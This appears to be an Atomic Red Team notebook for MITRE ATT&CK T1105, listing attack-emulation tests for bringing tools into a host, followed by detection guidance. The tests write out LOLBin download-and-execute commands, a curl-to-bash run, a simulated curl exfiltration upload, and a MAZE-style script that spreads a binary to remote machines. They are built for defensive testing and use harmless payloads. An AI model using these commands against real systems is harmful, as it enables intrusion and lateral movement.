# T1105 - Ingress Tool Transfer
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). 

On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)

Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts.

Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)

## Atomic Tests

### Atomic Test #1 - rsync remote file copy (push)
Utilize rsync to perform a remote file copy (push)

**Supported Platforms:** linux, macos

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: rsync must be installed on the machine 

##### Check Prereq Commands:
```sh
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi

```
##### Get Prereq Commands:
```sh
(pkg install -y rsync)||(sudo apt-get -y install rsync)

```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 1

### Atomic Test #2 - rsync remote file copy (pull)
Utilize rsync to perform a remote file copy (pull)

**Supported Platforms:** linux, macos
#### Dependencies:  Run with `sh`!
##### Description: rsync must be installed on the machine 

##### Check Prereq Commands:
```sh
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi

```
##### Get Prereq Commands:
```sh
(pkg install -y rsync)||(sudo apt-get -y install rsync)

```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 2

### Atomic Test #3 - scp remote file copy (push)Utilize scp to perform a remote file copy (push)
**Supported Platforms:** linux, macos#### Attack Commands: Run with `sh`
```sh
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 3

### Atomic Test #4 - scp remote file copy (pull)Utilize scp to perform a remote file copy (pull)
**Supported Platforms:** linux, macos#### Attack Commands: Run with `sh`
```sh
scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 4

### Atomic Test #5 - sftp remote file copy (push)Utilize sftp to perform a remote file copy (push)
**Supported Platforms:** linux, macos#### Attack Commands: Run with `sh`
```sh
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 5

### Atomic Test #6 - sftp remote file copy (pull)Utilize sftp to perform a remote file copy (pull)
**Supported Platforms:** linux, macos#### Attack Commands: Run with `sh`
```sh
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 6

### Atomic Test #7 - certutil download (urlcache)Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 7

#### Cleanup: 
```cmd
del Atomic-license.txt >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 7 -Cleanup

### Atomic Test #8 - certutil download (verifyctl)Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 8

#### Cleanup: 
```powershell
Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 8 -Cleanup

### Atomic Test #9 - Windows - BITSAdmin BITS DownloadThis test uses BITSAdmin.exe to schedule a BITS job for the download of a file.
This technique is used by Qbot malware to download payloads.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt %temp%\Atomic-license.txt
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 9

### Atomic Test #10 - Windows - PowerShell DownloadThis test uses PowerShell to download a payload.
This technique is used by multiple adversaries and malware families.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
(New-Object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt", "$env:TEMP\Atomic-license.txt")
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 10

#### Cleanup: 
```powershell
Remove-Item $env:TEMP\Atomic-license.txt -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 10 -Cleanup

### Atomic Test #11 - OSTAP Worming ActivityOSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
pushd \\localhost\C$
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 11

### Atomic Test #12 - svchost writing a file to a UNC pathsvchost.exe writing a non-Microsoft Office file to a file with a UNC path.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 12

#### Cleanup: 
```cmd
del C:\T1105.txt >nul 2>&1
del C:\\svchost.exe >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 12 -Cleanup

### Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe
Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed).
The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file.
By default, the test downloads the Atomic Red Team license file to the temp directory.

More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/

**Supported Platforms:** windows
#### Dependencies:  Run with `command_prompt`!
##### Description: Must have a Windows Defender version with MpCmdRun.exe installed
##### Check Prereq Commands:
```cmd
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe /?  >nul 2>&1

```
##### Get Prereq Commands:
```cmd
Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually"
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 13 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path %temp%\Atomic-license.txt
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 13

#### Cleanup: 
```cmd
del %temp%\Atomic-license.txt >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 13 -Cleanup

### Atomic Test #14 - whois file download
Download a remote file using the whois utility

**Supported Platforms:** linux, macos

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: The whois and timeout commands must be present

##### Check Prereq Commands:
```sh
which whois && which timeout

```
##### Get Prereq Commands:
```sh
echo "Please install timeout and the whois package"

```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 14 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
timeout --preserve-status 1 whois -h localhost -p 8443 "Hello from Atomic Red Team test T1105" > /tmp/T1105.whois.out
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 14

#### Cleanup: 
```sh
rm -f /tmp/T1105.whois.out
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 14 -Cleanup

### Atomic Test #15 - File Download via PowerShellUse PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 15

### Atomic Test #16 - File download with finger.exe on WindowsSimulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server.
Because this is being tested on the localhost, you should not be expecting a successful connection
https://www.exploit-db.com/exploits/48815
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
finger base64_filedata@localhost
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 16

### Atomic Test #17 - Download a file with IMEWDBLD.exeUse IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>" or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>.
Run "Get-ChildItem -Path C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include <FILENAME>* -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 17

#### Cleanup: 
```powershell
$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\" 
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include T1105* -Recurse -Force -File -ErrorAction SilentlyContinue)
if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 17 -Cleanup

### Atomic Test #18 - Curl Download File
The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior.
Expected output will include whether the file downloaded successfully or not.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Curl must be installed on system.

##### Check Prereq Commands:
```cmd
if (Test-Path C:\Windows\System32\Curl.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"

```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 18 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll
C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\users\public\music\allthethingsx64.dll
C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\programdata\allthethingsx64.dll
C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\allthethingsx64.dll
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 18

#### Cleanup: 
```cmd
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\programdata\allthethingsx64.dll >nul 2>&1
del %Temp%\allthethingsx64.dll >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 18 -Cleanup

### Atomic Test #19 - Curl Upload File
The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration
Expected output will include whether the file uploaded successfully or not.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Curl must be installed on system.

##### Check Prereq Commands:
```cmd
if (Test-Path C:\Windows\System32\Curl.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"

```
##### Description: A file must be created to upload

##### Check Prereq Commands:
```cmd
if (Test-Path c:\temp\atomictestfile.txt) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
echo "This is an Atomic Test File" > c:\temp\atomictestfile.txt

```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 19 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Windows\System32\Curl.exe -T c:\temp\atomictestfile.txt www.example.com
C:\Windows\System32\Curl.exe --upload-file c:\temp\atomictestfile.txt www.example.com
C:\Windows\System32\Curl.exe -d c:\temp\atomictestfile.txt www.example.com
C:\Windows\System32\Curl.exe --data c:\temp\atomictestfile.txt www.example.com
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 19

### Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download
Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file. 
The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user.
Upon successful execution the test will open calculator and Notepad executable for 10 seconds.
reference:
https://twitter.com/ElliotKillick/status/1455897435063074824
https://github.com/LOLBAS-Project/LOLBAS/pull/151
https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/
https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: #{Path_to_file} must exist on system.

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1105\src\T1105.bat") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1105\src\T1105.bat") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "PathToAtomicsFolder\T1105\src\T1105.bat"

```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 20 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\T1105\src\T1105.bat" 1>NUL 
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 20

#### Cleanup: 
```cmd
del /f/s/q %temp%\T1105 >nul 2>&1
rmdir /s/q %temp%\T1105 >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 20 -Cleanup

### Atomic Test #21 - MAZE Propagation Script
This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. 
Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.
Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html 

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Binary file must exist at specified location (#{binary_file})

##### Check Prereq Commands:
```powershell
if (Test-Path $env:comspec) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
write-host "The binary_file input parameter must be set to a binary that exists on this computer."

```
##### Description: Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt")

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null
echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line."

```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 21 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt"
$offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt"
$completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt"
foreach ($machine in get-content -path "$machine_list")
{if (test-connection -Count 1 -computername $machine -quiet) 
{cmd /c copy "$env:comspec" "\\$machine\C$\Windows\Temp\T1105.exe"
echo $machine >> "$completed_list"
wmic /node: "$machine" process call create "regsvr32.exe /i C:\Windows\Temp\T1105.exe"}
else
{echo $machine >> "$offline_list"}}
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 21

#### Cleanup: 
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") 
{foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
{wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
Remove-Item -path "\\$machine\C$\Windows\Temp\T1105.exe" -force -erroraction silentlycontinue}}
Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue
Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 21 -Cleanup

### Atomic Test #22 - Printer Migration Command-Line Tool UNC share folder into a zip fileCreate a ZIP file from a folder in a remote drive
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
del %TEMP%\PrintBrm.zip >nul 2>&1 
C:\Windows\System32\spool\tools\PrintBrm.exe -b -d \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\  -f %TEMP%\PrintBrm.zip -O FORCE
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 22

#### Cleanup: 
```cmd
del %TEMP%\PrintBrm.zip >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 22 -Cleanup

### Atomic Test #23 - Lolbas replace.exe use to copy file
Copy file.cab to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: #{replace_cab} must exist on system.

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1105\src\redcanary.cab") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1105\src\redcanary.cab") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "PathToAtomicsFolder\T1105\src\redcanary.cab"

```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 23 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
del %TEMP%\redcanary.cab >nul 2>&1
C:\Windows\System32\replace.exe "PathToAtomicsFolder\T1105\src\redcanary.cab" %TEMP% /A
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 23

#### Cleanup: 
```cmd
del %TEMP%\redcanary.cab >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 23 -Cleanup

### Atomic Test #24 - Lolbas replace.exe use to copy UNC fileCopy UNC file to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
del %TEMP%\redcanary.cab >nul 2>&1
C:\Windows\System32\replace.exe \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab %TEMP% /A
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 24

#### Cleanup: 
```cmd
del %TEMP%\redcanary.cab >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 24 -Cleanup

### Atomic Test #25 - certreq downloadUse certreq to download a file from the web**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
certreq.exe -Post -config https://example.com c:\windows\win.ini %temp%\Atomic-license.txt```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 25

#### Cleanup: 
```cmd
del %temp%\Atomic-license.txt >nul 2>&1```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 25 -Cleanup

### Atomic Test #26 - Download a file using wscript
Use wscript to run a local VisualBasic file to download a remote file
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: #{vbscript_file} must be exist on system.

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1105\src\T1105-download-file.vbs") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1105\src\T1105-download-file.vbs") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "PathToAtomicsFolder\T1105\src\T1105-download-file.vbs"

```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 26 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
wscript.exe "PathToAtomicsFolder\T1105\src\T1105-download-file.vbs"
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 26

#### Cleanup: 
```cmd
del Atomic-License.txt >nul 2>&1```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 26 -Cleanup

### Atomic Test #27 - Linux Download File and RunUtilize linux Curl to download a remote file, chmod +x it and run it.
**Supported Platforms:** linux#### Attack Commands: Run with `sh`
```sh
curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh; chmod +x atomic.sh | bash atomic.sh
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 27

#### Cleanup: 
```sh
rm atomic.sh
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 27 -Cleanup

### Atomic Test #28 - Nimgrab - Transfer Files
Use nimgrab.exe to download a file from the web. 

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: NimGrab must be installed on system.

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\nim.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\nim" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe" "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe"

```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 28 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt $env:TEMP\Atomic-license.txt
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 28

#### Cleanup: 
```cmd
del $env:TEMP\Atomic-license.txt >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 28 -Cleanup

### Atomic Test #29 - iwr or Invoke Web-Request downloadUse 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
powershell.exe iwr -URI https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -Outfile %temp%\Atomic-license.txt
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 29

#### Cleanup: 
```cmd
del %temp%\Atomic-license.txt >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1105 -TestNumbers 29 -Cleanup

## Detection
Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as [ftp](https://attack.mitre.org/software/S0095), that does not normally occur may also be suspicious.

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Specifically, for the finger utility on Windows and Linux systems, monitor command line or terminal execution for the finger command. Monitor network activity for TCP port 79, which is used by the finger utility, and Windows <code>netsh interface portproxy</code> modifications to well-known ports such as 80 and 443. Furthermore, monitor file system for the download/creation and execution of suspicious files, which may indicate adversary-downloaded payloads. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)


## Shield Active Defense
### PCAP Collection 
 Collect full network traffic for future research and analysis. 

 PCAP Collection allows a defenders to use the data to examine an adversary’s network traffic more closely, including studying if it is encoded and/or encrypted. PCAP can be run through tools to replay the traffic to get a real-time view of what happened over the wire. These tools can also parse the traffic and send results to a SIEM for monitoring and alerting.
#### Opportunity
There is an opportunity to collect network data and analyze the adversary activity it contains.
#### Use Case
Collecting full packet capture of all network traffic allows you to review what happened over the connection and identify command and control traffic and/or exfiltration activity.
#### Procedures
Collect PCAP on a decoy network to improve visibility into an adversary's network activity.
